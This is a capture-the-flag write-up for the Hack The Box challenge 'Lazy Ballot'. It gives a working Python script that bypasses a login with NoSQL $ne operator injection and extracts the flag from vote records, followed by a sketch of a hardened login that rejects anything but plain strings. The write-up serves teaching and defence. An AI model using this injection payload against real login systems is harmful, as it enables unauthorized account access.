https://app.hackthebox.com/challenges/533

Description

As a Zenium State hacker, your mission is to breach Arodor’s secure election system, subtly manipulating the results to create political chaos and destabilize their government, ultimately giving Zenium State an advantage in the global power struggle.

Exploitation

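#!/usr/bin/env python3
import requests
import sys

def get_flag(url):
    session = requests.Session()
    # Both fields are JSON objects carrying the $ne (not-equal) operator
    # instead of strings, so the credential lookup matches any stored user.
    payload = {
        "username": {"$ne": "x"},
        "password": {"$ne": "x"}
    }
    r = session.post(f"{url}/api/login", json=payload, timeout=10)
    if "authenticated successfully" not in r.text:
        print("[-] Auth bypass failed")
        return
    # Reuse the logged-in session for the authenticated endpoint.
    r = session.get(f"{url}/api/votes/list", timeout=10)
    # The flag sits in the region field of one of the vote documents.
    for vote in r.json()['resp']['votes']:
        if 'HTB{' in vote['doc']['region']:
            print(f"[+] Flag: {vote['doc']['region']}")
            return
    print("[-] Flag not found in vote list")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    url = "http://" + sys.argv[1]
    get_flag(url)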
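
The fix for this class of bug is to refuse anything but plain strings before the credentials reach the query. The sketch below is an added example, not the challenge's server code (which this page does not show): `USERS`, `matches`, `login_vulnerable` and `login_hardened` are hypothetical names, and the toy matcher supports only `$ne` and `$eq`.

```python
# Constructed sample data. Plaintext is used only to keep the toy short;
# a real store holds password hashes.
USERS = [{"username": "admin", "password": "constructed-secret"}]

def matches(doc, selector):
    """Toy selector matcher: plain equality plus the $ne / $eq operators."""
    for field, cond in selector.items():
        value = doc.get(field)
        if isinstance(cond, dict):
            for op, operand in cond.items():
                if op == "$ne":
                    if value == operand:
                        return False
                elif op == "$eq":
                    if value != operand:
                        return False
                else:
                    raise ValueError(f"unsupported operator: {op}")
        elif value != cond:
            return False
    return True

def login_vulnerable(body):
    # Request values go into the selector untouched, so a JSON object
    # such as {"$ne": "x"} is evaluated as an operator, not as data.
    selector = {"username": body.get("username"),
                "password": body.get("password")}
    return any(matches(user, selector) for user in USERS)

def login_hardened(body):
    # Accept only non-empty strings; objects, lists, numbers and null
    # are rejected before any query is built.
    username, password = body.get("username"), body.get("password")
    if not (isinstance(username, str) and isinstance(password, str)):
        return False
    if not username or not password:
        return False
    # Explicit $eq keeps the values on the data side of the selector.
    selector = {"username": {"$eq": username},
                "password": {"$eq": password}}
    return any(matches(user, selector) for user in USERS)
```

The same type check belongs in request schema validation, so operator-shaped input is rejected with a 400 before it reaches the login handler.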

Summary

Lazy Ballot: reduce the custom rules to a scriptable check and use the smallest reliable path to the flag.